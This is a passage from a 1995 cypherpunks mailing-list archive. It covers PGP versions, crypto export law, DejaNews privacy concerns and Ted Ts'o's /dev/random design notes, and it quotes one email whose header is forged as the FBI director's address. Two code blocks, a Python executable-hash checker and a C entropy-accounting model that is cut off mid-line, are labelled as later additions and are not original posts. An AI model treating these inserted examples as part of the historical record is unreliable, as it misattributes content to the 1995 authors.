display my total ignorance in other areas in very public forums.  Since
I have no professional reputation to protect (I don't work in the
crypto field) and don't really have any 'aspirations to become an
authority', I feel I can do this so long as I also make
an effort to answer the question in the area of my expertise and to
also share the information I gain.

The difference between ignorance and stupidity is that one decreases 
with time :-).

eric (who is quite happy to admit his ignorance :-)
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Mon, 6 Nov 1995 22:09:47 +0800
To: cypherpunks@toad.com
Subject: Crypto Law Survey - updated and online
Message-ID: <MAILQUEUE-101.951106143524.384@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


I have updated my survey of cryptography regulations worldwide. It is 
available at URL

http://www.kub.nl:2080/FRW/CRI/projects/bjk/lawsurvy.htm

Please set pointers to this URL rather than copy the file, as I 
intend to regularly (i.e., about once every two months) update the 
survey. 

I greatly appreciate comments, corrections, and additional 
information.

Bert-Jaap Koops
Center for Law and Informatization
Tilburg University
The Netherlands




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Tue, 7 Nov 1995 04:49:50 +0800
To: Usuario Acceso2 <acceso2@diatel.upm.es>
Subject: Re: Wich pgp is stronger?
In-Reply-To: <222*/S=acceso2/OU=diatel/O=upm/PRMD=iris/ADMD=mensatex/C=es/@MHS>
Message-ID: <199511062004.PAA10278@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Which pgp is supposed to be stronger, 2.6.2 or 2.6.2 i?
> 
> What are exactly the differences between them?

I'm not sure what you mean by "stronger"?  I must admit that I have
not taken a close look at 2.6.2i, but my understanding is that it is
an internationalized version of code similar to 2.6.2.  The keygen
routines, RNG, and IDEA code are the same; the RSA code is different,
but supports the same range of keysizes.  The difference in RSA code
has to do with US patent law, where PGP 2.6.2 uses RSAREF, so it is
licensed to do RSA.

Other than that, I doubt there is any real difference.  The major
crypto and security functions are the same (or should be -- as I said,
I've not taken a close look at 2.6.2i).

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Gimon" <gimonca@mirage.skypoint.com>
Date: Tue, 7 Nov 1995 06:17:32 +0800
To: cypherpunks@toad.com
Subject: DejaNews all over again--a URL for Usenet Searching (fwd)
Message-ID: <m0tCZ3A-0005LoC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> 
> I usually avoid passing on URLs of interesting sites, in the name of
> conserving bandwidth (*), but this one really has me jazzed:
> 
> http://dejanews.com/
> 
> It allows searching of Usenet archives (a few months' worth, from what I
> can see).
> 

> 
> "    Want to know what people are saying about some new book?  About
> some political topic?  Most importantly, about you behind your back?
> Check it out!  Lots of fun, and a bit scary."
> 

Or to paraphrase Huey Long, "Every Man a Kibo".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 7 Nov 1995 05:13:09 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Credentials Without Identity
In-Reply-To: <199511061951.LAA14798@netcom5.netcom.com>
Message-ID: <9511062041.AA15494@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>At 13:35 11/5/95 +0100, Mats Bergstrom wrote:
>>This applies very much so in Sweden too. It *is* illegal to maintain any
>>database with 'information on persons' (like their email addresses) without
>>approval from the Data Inspection. But it's an open secret that this law
>>is broken on a massive front and no bureaucrat is really trying to uphold it.

>So the address book I keep in my hip pocket is illegal!

Not in the UK, any database maintained on a computer system is
covered under the act. Manual records are not. This distinction
is made because a group of senior conservative party members
and supporters finance a group who keep records of "political
dissidents". These are available - for a fee for use in checking
employees before giving them jobs.

Personally I think that this type of behaviour is unacceptable
in a democracy and that it demonstrates the arrogance of power.
I also think it falls plumb center in the concerns of this group.
Should such groups be allowed to buy details of our spending 
habits from supermarkets? 


The UK law essentially means that data gathered for one purpose
may not be used for another purpose without permission. It is
entirely OK to have an address book of email addresses for the
purpose of sending them mail.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 7 Nov 1995 12:49:45 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: "The Policeman Inside"
In-Reply-To: <acc2319202021004e8ac@[205.199.118.202]>
Message-ID: <199511070019.QAA27707@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


TCM:

>Even if one believes taxes are "the price paid for civilization," there are
>superior alternatives to the current system. (My current favorite is:
>mandatory slavery for X days per year, regardless of age or ability.
>Instead of taxes, everyone works one day in five, or 2 months out of the
>year, etc., for the herd. Building roads, picking up trash, administering
>computers, etc. There are "lots of issues," but even I agree this list is
>not the best place to discuss it; I mention it in passing.)

good lord!! a kinder, gentler TCM!! a closet socialist!!

this does NOT sound like something I would read from the founder of
cryptoanarchy.

what is cyberspace coming to?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Tue, 7 Nov 1995 12:36:15 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: DejaNews all over again--a URL for Usenet Searching
In-Reply-To: <acc3adfa0702100476eb@[205.199.118.202]>
Message-ID: <Pine.3.89.9511061651.D23552-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


Synchronicity at work.

On Mon, 6 Nov 1995, Timothy C. May wrote:

> http://dejanews.com/
> 
> It allows searching of Usenet archives (a few months' worth, from what I
> can see).

It's extremely funny that you of all people should post this Tim, as your
tcmay@got.net address was the first thing I ran a search on when I 
discovered this site. 

Judging by the amount of posting you do here, I was surprised that I only
got 36 listings on your new address (1/3 of which quoted you but not 
directly written by you). Either you post more to alt, soc and talk (which they 
don't have) or you use a third address (the second thing I tried was 
tcmay@netcom.com, even less, though the archive's pretty recent, so that's
expected).

Hmm, so you know insiders at Apple and recently held around $65,000 of their 
stock and sold off, saving around $12k in the process after being tipped 
off? Hmmm... (from rec.investment or something along those lines. Want me
to repost your original article? heheheh. <insert evil smile>)

I figured I'd send this to you as a private note, but then I figured 
this thing really is scary and has a lot to do with anonymity. 
Watch out folks. Little Brother is saving everything you've ever said on 
usenet. Your old posts just won't go away. 

(Not that someone who is so open in his views and true name as yourself 
would mind, Tim, but I'm certainly happy for my sake, that alt isn't archived 
yet. It's bad enough they have rec.)

Ps. I will of course run searches on every other address that the who
command on majordomo@toad.com supplies me with, so watch what you say 
ladies, gents and otherwise. ;->
Get those 'nyms ready.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@acm.org
Date: Tue, 7 Nov 1995 07:27:35 +0800
To: cypherpunks@toad.com
Subject: GAK criteria
Message-ID: <9511062204.AA02788@tis.com>
MIME-Version: 1.0
Content-Type: text/plain



 http://csrc.ncsl.nist.gov/keyescrow/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@eng.usf.edu>
Date: Tue, 7 Nov 1995 11:55:32 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: re:using PGP only for digital signatures
In-Reply-To: <199511062107.NAA29648@ix5.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.951106170359.15489A-100000@armstrong>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Mon, 6 Nov 1995, Bill Stewart wrote:

> At 04:12 PM 11/4/95 -0500, James Black <black@eng.usf.edu> wrote:

> Somebody else has brought up the insecurity of using security software
> on multi-user machines, where the system administrator or anybody who cracks
> root can steal your passphrases and even replace the trustable software with
> trojan-horse versions; your students will be safer if they only trust stuff
> running on PCs from software they've verified themselves.  But you can at least
> do signature-checking safely on a multi-user machine if the software is
> protected adequately.

  I brought up the security issue with the administrator that I am 
talking with, about the implementation of PGP as it looks like it will go 
through all the hurdles.  The last difficulty is that we have a student 
that has an account here, but he is actually overseas (so we will have 
two copies of PGP, and he will use the international one, not the US 
one).  The security issue is important.  Part of that is that most users 
use dumb terminals, so any programs run will be done on remote servers.  
My solution (until I get a better idea) is to just write a mail program 
that can check the hash value (I think that is the term) of the PGP 
executable, compare it against the one that it created originally and use 
it, only if they are the same.  The user can also request the number, and 
write it down for his own personal comparisons.   The program will also 
automatically encrypt, if it finds the public key on the user's keyring, 
or the university's keyring.  I will now check on how secure the LAN 
network is, as I am a student and I want to know that the system is 
safe.  She (the administrator) felt that if it is safe against people 
getting into accounts it should be safe, but if my signature is on a 
document, then people will believe that it is from me (until I state 
otherwise), and that could be more damaging than getting into my account.
  Well, I am looking into the security side, since the legal issues are 
pretty much done with (IMOHO).  If anyone has any brilliant ideas as to 
how to run PGP on a multi-user network utilizing dumb terminals so it 
can be transparent I am interested in options.
  Well, take care and have fun, and I will look for RIPEM (I think that 
was the name) and see if that will be adequate, at the moment.

James Black
black@suntan.eng.usf.edu
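
[Added example, not part of James Black's message and not PGP's own code: the check he describes, hashing the executable, comparing with the value recorded originally and running only on a match. SHA-256, the JSON baseline file and every path are assumptions, and the demo files are constructed. It does not answer the point in the quoted text about whoever cracks root, who can replace the checker or the baseline as easily as the program.]

```python
"""Run a program only if its hash still matches a recorded baseline.

Added example. SHA-256, the JSON baseline format and all file names are
assumptions of this sketch, not details taken from the message above.
"""
import hashlib
import json
import os
import subprocess
import tempfile

CHUNK = 64 * 1024


def digest_fd(fd):
    """SHA-256 of the file behind an already-open descriptor."""
    h = hashlib.sha256()
    os.lseek(fd, 0, os.SEEK_SET)
    while True:
        block = os.read(fd, CHUNK)
        if not block:
            return h.hexdigest()
        h.update(block)


def record_baseline(binary_path, baseline_path):
    """Hash the trusted copy once and store the value. The digest is also
    returned so the user can write it down and compare by hand later."""
    fd = os.open(binary_path, os.O_RDONLY)
    try:
        digest = digest_fd(fd)
    finally:
        os.close(fd)
    with open(baseline_path, "w") as out:
        json.dump({"sha256": digest}, out)
    return digest


def check_fd(fd, baseline_path):
    """Return (ok, current_digest) for an open descriptor."""
    with open(baseline_path) as src:
        expected = json.load(src)["sha256"]
    current = digest_fd(fd)
    return current == expected, current


def check(binary_path, baseline_path):
    """Return (ok, current_digest) for the file currently at binary_path."""
    fd = os.open(binary_path, os.O_RDONLY)
    try:
        return check_fd(fd, baseline_path)
    finally:
        os.close(fd)


def run_verified(binary_path, baseline_path, args=()):
    """Hash and execute through the same descriptor (Linux /dev/fd), so a
    file renamed into place after the check is not the one that runs.
    In-place writes by a privileged user are not prevented by this."""
    fd = os.open(binary_path, os.O_RDONLY)
    try:
        ok, current = check_fd(fd, baseline_path)
        if not ok:
            raise PermissionError(
                f"{binary_path}: hash {current} differs from baseline")
        cmd = [f"/dev/fd/{fd}", *args]
        return subprocess.run(cmd, pass_fds=(fd,)).returncode
    finally:
        os.close(fd)


def demo():
    """Constructed stand-in for the PGP executable, then a modified copy."""
    with tempfile.TemporaryDirectory() as d:
        exe = os.path.join(d, "pgp")            # hypothetical path
        base = os.path.join(d, "pgp.baseline")  # hypothetical path
        with open(exe, "wb") as f:
            f.write(b"#!/bin/sh\nexit 0\n")
        recorded = record_baseline(exe, base)
        before = check(exe, base)
        # Simulate the executable being replaced after the baseline was taken.
        swapped = os.path.join(d, "pgp.new")
        with open(swapped, "wb") as f:
            f.write(b"#!/bin/sh\n# modified copy\nexit 0\n")
        os.replace(swapped, exe)
        after = check(exe, base)
        try:
            run_verified(exe, base)
            refused = False
        except PermissionError:
            refused = True
        return recorded, before, after, refused


if __name__ == "__main__":
    print(demo())
```
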




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Tue, 7 Nov 1995 12:00:44 +0800
To: gimonca@mirage.skypoint.com (Charles Gimon)
Subject: Re: DejaNews all over again
In-Reply-To: <m0tCZ3A-0005LoC@skypoint.com>
Message-ID: <199511062222.RAA14762@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain



My two cents: I've used Dejanews for almost a month now, and have been
consistently impressed with the results. The uses are many; the danger,
as others have noted, is that people forget (or never realize in the
first place) that you should never post anything to Usenet that you
wouldn't want to see plastered on the evening news.

Having said that, I'm greatly looking forward to the impending addition
of the alt.* groups to their archives. Everyone is indeed a Kibo now,
and the general public has become more aware of the need for reputations
as a result.

--
 http://yakko.cs.wmich.edu/~frogfarm  ..for the best in unapproved information
  EmmaGoldmanCamillePagliaMarieCurieAynRandSapphoDianaToriAmosPJHarvey&Demona
 Living in dread with your fragile brain and the executioner's got your number
 I feel a groove comin' on                              Freedom...yeah, right.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 7 Nov 1995 03:09:20 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: So much for free speech...[noise?]
In-Reply-To: <acc37a5b03021004553e@[205.199.118.202]>
Message-ID: <9511061846.AA21160@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


"Freedom shall stops where starts the one of the others"
That's what I learned, and what I think is a "good thing",
Thus, your freedom of speech shall stop where it starts hurting
people

[not that I support at all the childish way l^Hamericans sue everybody
for anything, but I am happy that racist sayings are not allowed and
can be condemned in France.]

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

class struggle domestic disruption Kennedy bomb Saddam Hussein Peking
 Kaser Sose




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.sf.ca.us (Lee Tien)
Date: Tue, 7 Nov 1995 11:31:00 +0800
To: cypherpunks@toad.com
Subject: forging headers
Message-ID: <199511070249.SAA14921@well.com>
MIME-Version: 1.0
Content-Type: text/plain


So I got this message.  How would someone identify the sender of this
message?  I'm writing an article on anonymity, with some discussion of
remailers, and want to argue that forging already permits people to raise
the costs of tracing significantly, anonymous remailers or no.  

Lee

>From: freeh@fbi.gov
>Date: Tue, 24 Oct 95 16:07:08 -0400
>Apparently-To: tien@well.sf.ca.us
>X-UIDL: 814570964.056
>
>> How difficult is it to forge headers?  How difficult is it to trace a
>> message to the actual sender if the header is forged?
>
>Not very difficult at all (to forge, that is).  This is a quick and dirty
>example that should be somewhat traceable.  If you want pointers on how to
>trace it, post the whole thing, including headers, to cypherpunks.
>
>Louis
>
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 7 Nov 1995 12:04:43 +0800
To: Stephen Whitaker <cypherpunks@toad.com
Subject: Re: toolkits?
Message-ID: <acc407190e0210046725@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:41 AM 11/7/95, Stephen Whitaker wrote:
>OK folks, nobody seems to have any ideas how to keep our little state of
>Vermont from falling prey to mediocrity in the internet. I thought with so
>many highly opinionated people I would at least get a few good or at least
>entertaining suggestions.

You may have gotten no responses because it generally is not up to a state
government to ensure that "mediocrity" in the Internet is avoided (though
I'm not sure what is meant by "mediocrity." If it is security and
anonymity, this is definitely the state government's responsibility, or
even area of interest.)


>just might have a prayer of doing it right, whatever that is. What would it
>look like if secure communications and anonymity were designed in from the
>start? Is this what Sameer is doing in Bezerkeley?
>
>What machines are considered minimum requirements to use these tools? What
>are the essential reference works?

"Security and anonymity" are not matters for government to ensure.

Imagine two Vermont residents, Bob of Burlington and Rhonda of Rutland. They
wish to communicate securely, and perhaps anonymously. Alas, the state
legislature in Montpelier is oblivious to their concerns, not even
answering their e-mail. What, oh what, are they to do?

Not to worry, as what Vermont does is irrelevant. Bob of Burlington can
encrypt his messages to Rhonda of Rutland and send them in any number of
ways. Compuserve, AOL, and (probably) Netcom will have local access points.


Happily, Rhonda of Rutland and Bob of Burlington (not their real names) can
communicate secretly, securely, and anonymously.

I urge you, Stephen, to read up on encryption and the benefits contained
therein. Looking to your state capital to secure your communications is a
lose.


--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Tue, 7 Nov 1995 12:14:19 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511061924.OAA14371@jekyll.piermont.com>
Message-ID: <m0tCcXa-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" writes:

: 
: "Peter D. Junger" writes:
: > "Perry E. Metzger" writes:
: > : It isn't clear that telecoms treaties don't implicitly make this legal
: > : in spite of the export regulations.
: > 
: > Once again, what the ITAR forbid is the disclosure of cryptographic
: > software to a foreign person within or without the United States, so
: > it does not make any difference whether the message containing the
: > code passes through the United States or not.
: 
: I understand that you are a lawyer and I'm not, but it is my
: understanding that international treaties come into play on this sort
: of thing. For instance, in international shipments, you can transship
: items and substances that are illegal to possess in a country through
: its ports provided that the materials do not originate or terminate
: their shipment in the country and remain sealed in their containers
: throughout. It is also my understanding that items like mail and phone
: calls that happen to transit a country are not necessarily subject to
: that nation's laws provided that the nation is not a terminal point for
: the mail or call or what have you.

The trouble is that the ITAR's definition of export that is relevant
to cryptographic software has nothing to do with exporting in the
normal sense, and therefore it has nothing to do with transhipments.

The definition of export that is relevant simply makes it a felony to
disclose  technical data, which is defined as including cryptographic
software, to a foreign person within or without the United States.
Thus I cannot disclose my materials for my course in Computers and the
Law, which include some cryptographic software, to a Canadian student
in the United States without getting a license, even though there is
an exception which would allow me to export the software to Canada.

It doesn't make any difference whether the disclosure--or the message
that makes the disclosure possible--passes through a foreign
jurisdiction or not.  It is the disclosure, and only the disclosure,
that requires the license.  Not the transmission of the message.

Don't blame this on my being a lawyer; blame it on some very sick
people in the Office of Defense Trade Controls and in the NSA.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Theodore Ts'o" <tytso@MIT.EDU>
Date: Tue, 7 Nov 1995 12:18:42 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: /dev/random - using up entropy?
In-Reply-To: <199511042352.PAA07554@ix4.ix.netcom.com>
Message-ID: <9511070110.AA07972@dcl.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Sat, 04 Nov 1995 15:52:03 -0800
   From: Bill Stewart <stewarts@ix.netcom.com>

   So that says you use up m bits of entropy if you get m bits of good output.

   However, what I'd like to suggest is that you don't, from the perspective
   of a user who doesn't have direct access to the reservoir R of random bits.
   For that user, p(X|H(R)=O) is the same as p(X) or P(X|H(R)=O'), because
   the user is neither able to invert H, nor to enumerate all possible R,
   nor to calculate anything useful based on multiple outputs, since the
   reservoir R is shuffled between outputs; even a simple circular shift
   may be enough.   This doesn't apply to the case where n is 32 or 48
   and the hash function produces n-bit outputs, or even m<<n bit outputs,
   because that may be inverted or brute-forced, but it seems to apply
   for the case where n is sufficiently large and the hash is good.
   If the hash is simpler than MD5, it may apply anyway, since the hash
   produces far fewer bits than its input, as long as the hash and the
   mixing function don't give away any information about the reservoir
   between successive outputs.

All of this assumes that MD5 or SHA, or whatever, is a "good hash
function".  Unfortunately, this strikes at the heart of "what we don't
know" about writing good hash functions, which is still today much more
of an art rather than a science.

So the conservative among us will probably not want to count on this
fact when generating long-term, valuable secrets, like public/private
keypairs.

   This would suggest that /dev/random ought to have a mode that says
   "give me output of whatever quality you have available",
   and that it ought to be OK to use it, as long as the reservoir has 
   been seeded with sufficient high-entropy input to have decent randomness.

Yup; in the Linux implementation which I've done, that's what the
/dev/urandom device is all about.  For most purposes, it's *probably*
good enough.  However, I would characterize it as numbers which are
"cryptographically random", as opposed to "truly random", in that they
depend on the intractability of MD5 towards analysis.  One can imagine a
descending scale of "quality of random numbers" where physically
generated random numbers would be best, followed by /dev/random numbers,
followed by /dev/urandom numbers.  It may be that /dev/urandom is just
as hard as /dev/random --- but given our current knowledge, it's
impossible to prove one way or the other.  

						- Ted

P.S.  Here's the header from my current /dev/random driver, if people
are interested:

/*
 * random.c -- A strong random number generator
 *
 * Version 0.95, last modified 4-Nov-95
 * 
 * Copyright Theodore Ts'o, 1994, 1995.  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, and the entire permission notice in its entirety,
 *    including the disclaimer of warranties.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote
 *    products derived from this software without specific prior
 *    written permission.
 * 
 * ALTERNATIVELY, this product may be distributed under the terms of
 * the GNU Public License, in which case the provisions of the GPL are
 * required INSTEAD OF the above restrictions.  (This clause is
 * necessary due to a potential bad interaction between the GPL and
 * the restrictions contained in a BSD-style copyright.)
 * 
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
 * WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 * DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
 * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
 * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
 * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
 * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
 * OF THE POSSIBILITY OF SUCH DAMAGE.
 */

/*
 * (now, with legal B.S. out of the way.....) 
 * 
 * This routine gathers environmental noise from device drivers, etc.,
 * and returns good random numbers, suitable for cryptographic use.
 * Besides the obvious cryptographic uses, these numbers are also good
 * for seeding TCP sequence numbers, and other places where it is
 * desirable to have numbers which are not only random, but hard to
 * predict by an attacker.
 *
 * Theory of operation
 * ===================
 * 
 * Computers are very predictable devices.  Hence it is extremely hard
 * to produce truly random numbers on a computer --- as opposed to
 * pseudo-random numbers, which can easily be generated by using an
 * algorithm.  Unfortunately, it is very easy for attackers to guess
 * the sequence of pseudo-random number generators, and for some
 * applications this is not acceptable.  So instead, we must try to
 * gather "environmental noise" from the computer's environment, which
 * must be hard for outside attackers to observe, and use that to
 * generate random numbers.  In a Unix environment, this is best done
 * from inside the kernel.
 * 
 * Sources of randomness from the environment include inter-keyboard
 * timings, inter-interrupt timings from some interrupts, and other
 * events which are both (a) non-deterministic and (b) hard for an
 * outside observer to measure.  Randomness from these sources are
 * added to an "entropy pool", which is mixed using a CRC-like function.
 * This is not cryptographically strong, but it is adequate assuming
 * the randomness is not chosen maliciously, and it is fast enough that
 * the overhead of doing it on every interrupt is very reasonable.
 * As random bytes are mixed into the entropy pool, the routines keep
 * an *estimate* of how many bits of randomness have been stored into
 * the random number generator's internal state.
 * 
 * When random bytes are desired, they are obtained by taking the MD5
 * hash of the contents of the "entropy pool".  The MD5 hash avoids
 * exposing the internal state of the entropy pool.  It is believed to
 * be computationally infeasible to derive any useful information
 * about the input of MD5 from its output.  Even if it is possible to
 * analyze MD5 in some clever way, as long as the amount of data
 * returned from the generator is less than the inherent entropy in
 * the pool, the output data is totally unpredictable.  For this
 * reason, the routine decreases its internal estimate of how many
 * bits of "true randomness" are contained in the entropy pool as it
 * outputs random numbers.
 * 
 * If this estimate goes to zero, the routine can still generate
 * random numbers; however, an attacker may (at least in theory) be
 * able to infer the future output of the generator from prior
 * outputs.  This requires successful cryptanalysis of MD5, which is
 * not believed to be feasible, but there is a remote possibility.
 * Nonetheless, these numbers should be useful for the vast majority
 * of purposes.
 * 
 * Exported interfaces ---- output
 * ===============================
 * 
 * There are three exported interfaces; the first is one designed to
 * be used from within the kernel:
 *
 * 	void get_random_bytes(void *buf, int nbytes);
 *
 * This interface will return the requested number of random bytes,
 * and place it in the requested buffer.
 * 
 * The two other interfaces are two character devices /dev/random and
 * /dev/urandom.  /dev/random is suitable for use when very high
 * quality randomness is desired (for example, for key generation or
 * one-time pads), as it will only return a maximum of the number of
 * bits of randomness (as estimated by the random number generator)
 * contained in the entropy pool.
 * 
 * The /dev/urandom device does not have this limit, and will return
 * as many bytes as are requested.  As more and more random bytes are
 * requested without giving time for the entropy pool to recharge,
 * this will result in random numbers that are merely cryptographically
 * strong.  For many applications, however, this is acceptable.
 *
 * Exported interfaces ---- input
 * ==============================
 * 
 * The current exported interfaces for gathering environmental noise
 * from the devices are:
 * 
 * 	void add_keyboard_randomness(unsigned char scancode);
 * 	void add_mouse_randomness(__u32 mouse_data);
 * 	void add_interrupt_randomness(int irq);
 * 	void add_blkdev_randomness(int irq);
 * 
 * add_keyboard_randomness() uses the inter-keypress timing, as well as the
 * scancode as random inputs into the "entropy pool".
 * 
 * add_mouse_randomness() uses the mouse interrupt timing, as well as
 * the reported position of the mouse from the hardware.
 *
 * add_interrupt_randomness() uses the inter-interrupt timing as random
 * inputs to the entropy pool.  Note that not all interrupts are good
 * sources of randomness!  For example, the timer interrupt is not a
 * good choice, because the periodicity of the interrupts is too
 * regular, and hence predictable to an attacker.  Disk interrupts are
 * a better measure, since the timing of the disk interrupts are more
 * unpredictable.
 * 
 * add_blkdev_randomness() times the finishing time of block requests.
 * 
 * All of these routines try to estimate how many bits of randomness a
 * particular randomness source.  They do this by keeping track of the
 * first and second order deltas of the event timings.
 *
 * Acknowledgements:
 * =================
 *
 * Ideas for constructing this random number generator were derived
 * from the Pretty Good Privacy's random number generator, and from
 * private discussions with Phil Karn.  Colin Plumb provided a faster
 * random number generator, which speed up the mixing function of the
 * entropy pool, taken from PGP 3.0 (under development).  It has since
 * been modified by myself to provide better mixing in the case where
 * the input values to add_entropy_word() are mostly small numbers.
 * 
 * Any flaws in the design are solely my responsibility, and should
 * not be attributed to the Phil, Colin, or any of authors of PGP.
 * 
 * The code for MD5 transform was taken from Colin Plumb's
 * implementation, which has been placed in the public domain.  The
 * MD5 cryptographic checksum was devised by Ronald Rivest, and is
 * documented in RFC 1321, "The MD5 Message Digest Algorithm".
 * 
 * Further background information on this topic may be obtained from
 * RFC 1750, "Randomness Recommendations for Security", by Donald
 * Eastlake, Steve Crocker, and Jeff Schiller.
 */
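
The entropy accounting described in the header comment above, as an added example that is not part of Ted Ts'o's message or driver: timing events are credited from their first and second order deltas, a /dev/random-style read is limited by the estimate, and a /dev/urandom-style read is not. The credit formula (floor(log2) of the smaller delta), the 12-bit cap, the 4096-bit pool size, the two-event warm-up and all names are assumptions; only the accounting is modelled, no random bytes are produced.

```c
/* Added illustration: models only the entropy *accounting* described in the
 * random.c header comment. Not the driver's code; constants are assumed. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define POOL_CAPACITY_BITS 4096u  /* assumed pool size */
#define MAX_CREDIT_BITS    12u    /* assumed cap on credit per event */

struct entropy_pool { unsigned entropy_bits; };

/* Per-source timing history: last timestamp and last first-order delta. */
struct source_state { uint32_t last_time; int64_t last_delta; unsigned seen; };

static uint64_t magnitude(int64_t v) { return v < 0 ? (uint64_t)(-v) : (uint64_t)v; }

static unsigned floor_log2(uint64_t v)
{
    unsigned bits = 0;
    while (v >>= 1)
        bits++;
    return bits;              /* 0 for v == 0 and v == 1 */
}

/* Credit one timing event. A perfectly periodic source has a second-order
 * delta of zero and therefore earns nothing, however often it fires. */
unsigned credit_event(struct entropy_pool *pool, struct source_state *src, uint32_t now)
{
    int64_t delta  = (int64_t)now - (int64_t)src->last_time;
    int64_t delta2 = delta - src->last_delta;
    uint64_t d1 = magnitude(delta), d2 = magnitude(delta2);
    unsigned credit;

    src->last_time = now;
    src->last_delta = delta;
    if (src->seen < 2) {      /* assumed warm-up: no history to compare against yet */
        src->seen++;
        return 0;
    }
    credit = floor_log2(d1 < d2 ? d1 : d2);
    if (credit > MAX_CREDIT_BITS)
        credit = MAX_CREDIT_BITS;
    pool->entropy_bits += credit;
    if (pool->entropy_bits > POOL_CAPACITY_BITS)
        pool->entropy_bits = POOL_CAPACITY_BITS;
    return credit;
}

/* Feed a whole trace from one source; returns the total bits credited. */
unsigned feed_trace(struct entropy_pool *pool, const uint32_t *times, size_t n)
{
    struct source_state src = {0, 0, 0};
    unsigned total = 0;
    for (size_t i = 0; i < n; i++)
        total += credit_event(pool, &src, times[i]);
    return total;
}

/* /dev/random-style read: grants at most the estimated entropy (whole bytes). */
size_t read_random_style(struct entropy_pool *pool, size_t want)
{
    size_t avail = pool->entropy_bits / 8;
    size_t granted = want < avail ? want : avail;
    pool->entropy_bits -= (unsigned)(granted * 8);
    return granted;
}

/* /dev/urandom-style read: always grants; the estimate is debited down to 0. */
size_t read_urandom_style(struct entropy_pool *pool, size_t want)
{
    size_t bits = want * 8;
    pool->entropy_bits = bits >= pool->entropy_bits
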